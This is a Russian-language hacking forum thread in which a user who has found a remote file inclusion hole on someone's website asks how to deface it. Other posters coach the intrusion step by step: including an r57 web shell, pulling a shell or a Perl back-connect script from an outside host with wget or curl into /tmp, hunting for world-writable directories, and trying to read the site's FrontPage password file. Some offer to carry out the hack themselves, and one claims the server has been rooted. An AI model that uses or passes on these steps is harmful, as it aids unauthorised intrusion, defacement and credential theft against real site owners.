![]() |
Не работает system("echo Hacked > index.php");
Нашёл на сайте удалённый инклуд. Могу подключать и выполнять любые PHP скрипты. Но есть одно но
Я не могу на том сервере создавать и писать в файлы PHP код:
PHP код:
Как можно это обойти? И вопрос в догонку: Как мне получить список файлов каталога, который находится на порядок выше? PHP код:
|
system() может быть запрещено использовать сервером
по поводу fopen() - это уже странно.. ты уверен, что прав хватает? я сомневаюсь... |
system разрешён. потому как
PHP код:
А вот то что прав не хватает - скорее оно так и есть. Что можно предпринять в этом случае? |
проинклудь шел какойнить и посмотри
|
Пытался проинклудить r57shell, но в итоге получаю пустую страницу...
|
Цитата:
Команда для листинга верхнего каталога - ls /../ |
Опа, спасибо... а я пытался сделать
PHP код:
Цитата:
Но всё же, как задефейсить в данном случае? :) |
С помощью качалки стоящей на сервере скачиваешь полноценный шелл - это либо wget, curl и т.д. если не стоит ничего есть команда lwp-mirror, почитай вобще в гуглу
что-то типа - system('wget http://shell.php') |
PHP код:
|
Выполняю комманду system('wget http://site/shell.txt'), а потом system('ls')
Изменений не видно... |
Цитата:
PHP код:
Warning: fopen(./site.php) [function.fopen]: failed to open stream: Permission denied in http://site/hack on line 3 Warning: fputs(): supplied argument is not a valid stream resource in http://site/hack on line 4 Warning: fclose(): supplied argument is not a valid stream resource in http://site/hack on line 5 |
А откуда ты его wget'ишь? :) у вгета 2 параметра: куда и откуда
Складируй файлы туда, куда доступ открыт. Смайлы или аватары, или хз что там еще может быть |
Теперь делаю так
PHP код:
|
ls -la и посмотри куда доступ есть
|
Везде стоит drwxr-xr-x или -rw-r--r--
Что должно стоять, что бы был доступ? :rolleyes: Добавлено Вот полный список директории, в которой находится сайт Код:
total 67 |
wget,get,curl,lynx,links ?
wget может быть отключен |
phpinfo() говорит о том что cURL включён.
Как закачать файл через get,curl,lynx,links или где мне об этом можно почитать? |
http://php.fud.ru/ там curl поищи.
lynx это бровсер drwx--x--x 11 user user 1024 Aug 11 01:59 .. Есть там еще .htaccess - должно быть интересно внутри |
Вот содержимое .htaccess
Код:
# -FrontPage- IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti* order deny,allow deny from all allow from all order deny,allow deny from all AuthName www.site.org AuthUserFile /home/user/public_html/_vti_pvt/service.pwd AuthGroupFile /home/user/public_html/_vti_pvt/service.grp |
При попытке прочитать service.pwd получаю
Код:
Warning: readfile() [function.readfile]: open_basedir restriction in effect. File(/home/user/public_html/_vti_pvt/service.pwd) is not within the allowed path(s): (/home/user/:/usr/lib/php:/usr/local/lib/php:/tmp) in http://mysite/shell on line 16 |
А вот результат выполнения ls -la /../
Код:
total 1644 |
google.com:
Не найдено ни одного документа, соответствующего запросу inurl:"php.fud.ru" curl. |
Попробуй создать папка. mkdir name_papla.
Потом поставь права 777. chmod 777 name_papka Потом проверь сущевствуют ли вощ качалки. С помощью команды which. Пример:which wget Если покажет путь до wget'a то значит он сущевствует. А если не чего не появится, значит качалки не сущевствует. |
Еще написать как пользоваться гуглом?
|
Цитата:
Уже нашёл про curl и изучаю. Просто на том сайте, что вы мне дали - нет этого материала... Насколько я понял, curl закачивает по ftp? |
curl --output /ПУТЬ_ДО_ЗАКАЧИВАЕМОГО_ФАЙЛ /SHELL.PHP http://XOST.COM/SHELL.TXT
ПРОВЕРЬ КОМАНДОЙ find . -type d -perm -2 -ls В КАКИЕ ПАПКИ МОЖНО ПИСАТЬ. Я бы на твоем месте сделал так. Создал бы перловый сценарий вида system("cd /home;find . -type d -perm -2 -ls!!!!!!!!!!! |
wget стоит
/usr/bin/wget Папку создать не хватает прав... :( |
а по запросу system("cd /home;find . -type d -perm -2 -ls") ничего не выдаётся...
|
или просто залей back.pl в tmp и выполни. Сценарий system("cd /tmp;curl --output /tmp/b.pl http://narod.ru/b.pl";perl b.pl);
CODE b.pl: Код:
#!/usr/bin/perl |
Кинь в личку линк! Все сделаю!
|
Цитата:
|
Чего вы все так паритесь? Разве после слов
Цитата:
Выход один - рутать сервак, а ето для ТС видимо еще рановато... |
Он зарутал.!)
|
Цитата:
ls /../ можно заменить на ls / - этой командой ты выполняешь листинг корня =\ Цитата:
или если ты хочешь найти папки на запись именно в каталоге /home, то выполняй find /home -type d -perm -2 -ls и не надо ставить cd /home =\\\ |
Да это чувак , который вопрос задал молодой еще и не заинклудил как надо(для таких r57 самое то). Я ему заинклудил уже.
|
Цитата:
PHP код:
|
| Время: 13:24 |